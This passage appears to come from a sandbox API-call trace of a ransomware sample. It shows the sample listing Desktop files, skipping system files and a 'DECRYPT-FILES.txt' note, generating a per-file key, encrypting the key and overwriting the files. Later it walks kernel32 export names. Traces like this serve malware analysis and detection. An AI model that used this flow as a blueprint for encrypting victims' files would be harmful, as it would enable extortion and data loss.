flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.407] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0083.407] CloseHandle (hObject=0x0) returned 0 [0083.407] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.408] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93dad490, ftCreationTime.dwHighDateTime=0x1d4cd65, ftLastAccessTime.dwLowDateTime=0x8ce714a0, ftLastAccessTime.dwHighDateTime=0x1d4d391, ftLastWriteTime.dwLowDateTime=0x8ce714a0, ftLastWriteTime.dwHighDateTime=0x1d4d391, nFileSizeHigh=0x0, nFileSizeLow=0xfdbf, dwReserved0=0x0, dwReserved1=0x0, cFileName="J_aqHGSKk0khojmC4hut.m4a", cAlternateFileName="J_AQHG~1.M4A")) returned 1 [0083.408] lstrcmpiW (lpString1="J_aqHGSKk0khojmC4hut.m4a", lpString2="DECRYPT-FILES.txt") returned 1 [0083.408] lstrcmpiW (lpString1="J_aqHGSKk0khojmC4hut.m4a", lpString2="autorun.inf") returned 1 [0083.408] lstrcmpiW (lpString1="J_aqHGSKk0khojmC4hut.m4a", lpString2="boot.ini") returned 1 [0083.408] lstrcmpiW (lpString1="J_aqHGSKk0khojmC4hut.m4a", lpString2="desktop.ini") returned 1 [0083.408] lstrcmpiW (lpString1="J_aqHGSKk0khojmC4hut.m4a", lpString2="ntuser.dat") returned -1 [0083.408] lstrcmpiW (lpString1="J_aqHGSKk0khojmC4hut.m4a", lpString2="iconcache.db") returned 1 [0083.408] lstrcmpiW (lpString1="J_aqHGSKk0khojmC4hut.m4a", lpString2="bootsect.bak") returned 1 [0083.408] lstrcmpiW (lpString1="J_aqHGSKk0khojmC4hut.m4a", lpString2="ntuser.dat.log") returned -1 [0083.408] lstrcmpiW (lpString1="J_aqHGSKk0khojmC4hut.m4a", lpString2="thumbs.db") returned -1 [0083.408] lstrcmpiW (lpString1="J_aqHGSKk0khojmC4hut.m4a", lpString2="Bootfont.bin") returned 1 [0083.408] lstrlenW (lpString="J_aqHGSKk0khojmC4hut.m4a") returned 24 [0083.408] lstrcmpiW (lpString1="m4a", lpString2="lnk") returned 1 [0083.408] lstrcmpiW (lpString1="m4a", lpString2="exe") returned 1 [0083.408] lstrcmpiW (lpString1="m4a", lpString2="sys") returned -1 [0083.408] lstrcmpiW (lpString1="m4a", lpString2="dll") returned 1 [0083.408] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 38 [0083.408] lstrlenW (lpString="J_aqHGSKk0khojmC4hut.m4a") returned 24 [0083.408] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0083.408] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="J_aqHGSKk0khojmC4hut.m4a" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\J_aqHGSKk0khojmC4hut.m4a") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\J_aqHGSKk0khojmC4hut.m4a" [0083.408] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.408] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\J_aqHGSKk0khojmC4hut.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\j_aqhgskk0khojmc4hut.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0083.408] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=64959) returned 1 [0083.409] CreateFileMappingW (hFile=0x438, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x43c [0083.409] MapViewOfFile (hFileMappingObject=0x43c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0083.409] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0083.409] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0083.409] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0083.409] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0083.409] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0083.411] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.411] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0083.412] CloseHandle (hObject=0x43c) returned 1 [0083.412] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.412] WriteFile (in: hFile=0x438, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0083.412] CloseHandle (hObject=0x0) returned 0 [0083.412] CloseHandle (hObject=0x438) returned 1 [0083.413] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.413] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.413] GetTickCount () returned 0x114d52a [0083.413] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.413] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0083.413] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0083.414] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0083.414] lstrlenA (lpString="kernel32.dll") returned 12 [0083.414] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0083.414] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0083.414] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0083.414] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0083.414] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0083.414] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0083.414] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0083.414] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0083.414] lstrlenA (lpString="ADDATOMA") returned 8 [0083.414] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0083.414] lstrlenA (lpString="ADDATOMW") returned 8 [0083.414] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0083.414] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0083.414] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0083.414] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0083.414] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0083.414] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0083.414] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0083.415] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0083.415] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0083.415] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0083.415] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0083.415] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0083.415] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0083.415] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0083.415] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0083.415] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0083.415] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0083.415] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0083.415] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0083.415] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0083.415] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0083.415] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0083.415] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0083.415] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0083.415] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0083.415] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0083.415] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0083.415] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0083.415] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0083.415] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0083.415] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0083.415] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0083.415] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0083.415] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0083.415] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0083.415] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0083.415] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0083.415] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0083.415] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0083.415] lstrlenA (lpString="BACKUPREAD") returned 10 [0083.415] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0083.415] lstrlenA (lpString="BACKUPSEEK") returned 10 [0083.415] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0083.416] lstrlenA (lpString="BACKUPWRITE") returned 11 [0083.416] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0083.416] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0083.416] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0083.416] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0083.416] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0083.416] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0083.416] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0083.416] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0083.416] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0083.416] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0083.416] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0083.416] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0083.416] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0083.416] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0083.416] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0083.416] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0083.416] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0083.416] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0083.416] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0083.416] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0083.416] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0083.416] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0083.416] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0083.416] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0083.416] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0083.416] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0083.416] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0083.416] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0083.416] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0083.416] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0083.416] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0083.416] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0083.416] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0083.416] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0083.417] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0083.417] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0083.417] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0083.417] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0083.417] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0083.417] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0083.417] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0083.417] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0083.417] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0083.417] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0083.417] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0083.417] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0083.417] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0083.417] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0083.417] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0083.417] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0083.417] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0083.417] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0083.417] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0083.417] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0083.417] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0083.417] lstrlenA (lpString="BEEP") returned 4 [0083.417] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0083.417] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0083.417] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0083.417] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0083.417] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0083.417] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0083.417] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0083.417] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0083.417] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0083.417] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0083.417] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0083.417] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0083.417] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0083.417] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0083.418] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0083.418] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0083.418] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0083.418] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0083.418] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0083.418] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0083.418] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0083.418] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0083.418] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0083.418] lstrlenA (lpString="CANCELIO") returned 8 [0083.418] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0083.418] lstrlenA (lpString="CANCELIOEX") returned 10 [0083.418] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0083.418] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0083.418] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0083.418] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0083.418] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0083.418] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0083.418] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0083.418] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0083.418] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0083.418] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0083.418] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0083.418] lstrlenA (lpString="CHECKELEVATION") returned 14 [0083.418] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0083.418] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0083.418] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0083.418] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0083.418] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0083.418] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0083.418] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0083.418] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0083.418] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0083.418] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0083.418] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0083.418] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0083.419] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0083.419] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0083.419] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0083.419] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0083.419] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0083.419] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0083.419] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0083.419] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0083.419] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0083.419] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0083.419] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0083.419] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0083.419] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0083.419] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0083.419] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0083.419] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0083.419] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0083.419] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0083.419] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0083.419] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0083.419] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0083.419] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 